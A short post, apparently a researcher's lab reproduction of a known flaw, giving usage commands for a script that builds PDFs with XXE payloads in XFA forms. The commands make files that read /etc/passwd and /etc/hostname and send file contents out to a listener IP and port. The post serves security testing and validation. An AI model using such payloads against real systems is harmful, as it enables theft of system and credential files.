Disclaimer: I am not the original discoverer of this vulnerability. This post documents my process of reproducing the issue in a controlled environment for educational purposes and to help others validate their own systems. The tests were conducted in an isolated lab with no impact to production systems.
Usage:
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
